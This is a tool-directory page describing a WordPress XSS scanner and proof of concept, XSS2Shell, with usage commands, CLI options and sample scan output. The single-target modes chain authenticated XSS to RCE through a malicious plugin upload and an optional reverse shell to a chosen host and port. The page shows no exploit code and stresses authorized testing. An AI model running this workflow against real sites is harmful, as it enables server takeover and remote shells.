Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
XSS2Shell-CVE-2026-64638 — WordPress 安全扫描器,可对版本进行指纹识别,跨多个目标并发检测反射型 XSS,并支持经身份验证的 XSS 到 RCE 漏洞利用工作流,适用于授权测试。 | Kitploit
工具/GitHubGitHub/mr-leonardogomes/xss2shell-cve-2026-64638
侦察Web漏洞扫描器漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubmr-leonardogomes/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

WordPress 安全扫描器,可对版本进行指纹识别,跨多个目标并发检测反射型 XSS,并支持经身份验证的 XSS 到 RCE 漏洞利用工作流,适用于授权测试。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
171个月前尚未审核

🔍 @Mr-LeonardoGomes

💀 XSS2Shell-CVE-2026-64638

Versão 2026 Status Ativo PRs Bem-vindos Licença MIT
Feito com amor Bug Bounty 2026 Pentest Metodologia

2026 年漏洞狩猎方法论

XSS2Shell 多目标扫描器

开发者: 致谢:YogaGymn

用于 WordPress 授权安全测试的 PoC/扫描工具。该项目包含针对单一目标的利用流程,以及一个并发的仅扫描多目标模式。

重要提示: 请仅在您拥有或已获得明确测试授权的 WordPress 安装上使用此项目。多目标扫描器有意仅限于版本识别和 XSS 反射检测;它不会针对目标列表执行凭据捕获、插件上传或 RCE。

功能特性

单一目标模式

原始脚本支持:

  • WordPress 版本识别。
  • XSS 反射检测。
  • auto、xss 和 direct 模式。
  • WordPress 直接认证流程和插件上传。
  • 原始 PoC 中存在的 XSS 链功能。
  • 原始 PoC 中存在的可选回调/反向 Shell 功能。

多目标模式

新增的扫描器支持:

  • 从文本文件读取目标。
  • 移除重复目标。
  • 使用 ThreadPoolExecutor 进行并发扫描。
  • 可配置的 workers 数量。
  • WordPress 版本检测。
  • XSS 反射检测。
  • 进度报告。
  • 结果按输入文件的相同顺序保存。
  • 汇总统计。

多目标模式不会调用原始的 RCE 函数。

要求

  • Python 3.9+
  • requests

安装依赖:

root@kitploit:~
python3 -m pip install requests

如果您的 Linux 发行版使用外部管理的 Python 环境,请使用虚拟环境:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install requests

安装

克隆或复制项目:原始 exploit 来自 yogaGymn

root@kitploit:~
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

或者直接放置:

root@kitploit:~
xss2shell.py

到您的工作目录中。

多目标扫描器

创建一个名为 targets.txt OU alvos.txt 的文件:

root@kitploit:~
https://example1.test
https://example2.test
https://example3.test

注释和空行将被忽略:

root@kitploit:~
# Alvos de laboratório autorizado
https://example1.test

https://example2.test

运行扫描器:

root@kitploit:~
python3 xss2shell.py -i targets.txt

默认并发数为 10 个 workers。

更改并发数

例如,使用 20 个 workers:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 20

对于小型实验室:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 5

不要选择不必要地高的 workers 数量,因为这可能会增加连接负载并触发速率限制或防御控制。

更改输出文件

root@kitploit:~
python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

示例输出

root@kitploit:~
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

结果格式

默认的 scan_results.txt 使用制表符分隔的字段:

root@kitploit:~
TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

示例:

root@kitploit:~
https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

XSS 状态值


状态 含义


XSS_REFLECTION_DETECTED 扫描器检测到所测试的 HTML 反射行为。这本身 并不能证明存在 RCE。

XSS_NOT_DETECTED 未检测到所测试的反射。

ERROR 检查过程中发生异常。

XSS 详细信息值

扫描器可以报告如下详细信息:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

这些值描述了检测例程观察到的响应;在将结果视为已确认的漏洞之前,必须手动验证它们。

单一目标用法

原始脚本也支持单一目标参数。

自动模式

root@kitploit:~
python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

直接模式

root@kitploit:~
python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

XSS 模式

root@kitploit:~
python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

XSS/直接模式工作流可能会创建或激活包含命令执行功能的插件。请仅在授权的测试环境中使用它们。

CLI 参考

root@kitploit:~
usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

参数


参数 说明


target 单一目标 URL。

-i, --input 包含多个目标的文件。

--output 多目标结果的输出文件。 默认值:scan_results.txt。

--workers 并发 worker 数量。 默认值:10。

--mode 原始单一目标模式: auto、xss 或 direct。

-u, --username WordPress 用户名,用于原始 直接/回退工作流。

-p, --password WordPress 密码,用于原始 直接/回退工作流。

--lhost 原始 PoC 的回调/反向 Shell 主机。

--lport 反向 Shell 端口。默认值: 4444。

--slug 插件 slug。默认值:xss2shell。

--callback-port 回调服务器端口。默认值: 9090。

--no-rev 在原始工作流中跳过反向 Shell 触发。

并发扫描的工作原理

多目标模式使用以下 Python 功能:

root@kitploit:~
ThreadPoolExecutor

每个目标被提交为独立的扫描任务:

root@kitploit:~
targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

结果会在任务完成时被收集,而最终输出则按照目标的原始顺序生成。

范围与安全

多目标模式是为授权的安全评估和实验室环境而设计的。

推荐的工作流程:

  1. 获得书面授权。
  2. 仅在 targets.txt 文件中包含获得授权的域/IP。
  3. 从较少的 workers(执行进程)数量开始。
  4. 分析扫描器输出。
  5. 手动验证相关发现。
  6. 记录证据和修复措施。

未经许可,请勿对第三方系统使用该扫描器。

限制

该扫描器不是完整的漏洞评估工具。

特别是:

  • 检测到的 HTML 反射并不自动证明存在可利用的 XSS 漏洞。
  • 从公共 endpoints 获取的 WordPress 版本可能缺失或不正确。
  • unknown(未知)状态并不意味着目标存在漏洞。
  • 网络错误可能导致不完整的结果。
  • WAF/CDN 行为可能影响检测。
  • 在多目标模式下,扫描器不判断可利用性或 RCE 可能性。
  • 在报告漏洞之前,必须手动验证结果。

项目结构

root@kitploit:~
.
├── xss2shell.py
├── targets.txt
└── scan_results.txt

许可证

所提供的源代码中没有任何许可证信息。

如果该项目公开发布,请添加一个明确的许可证文件,例如 LICENSE。此代码是 ZSecurity 原始代码的后续开发。

下载工具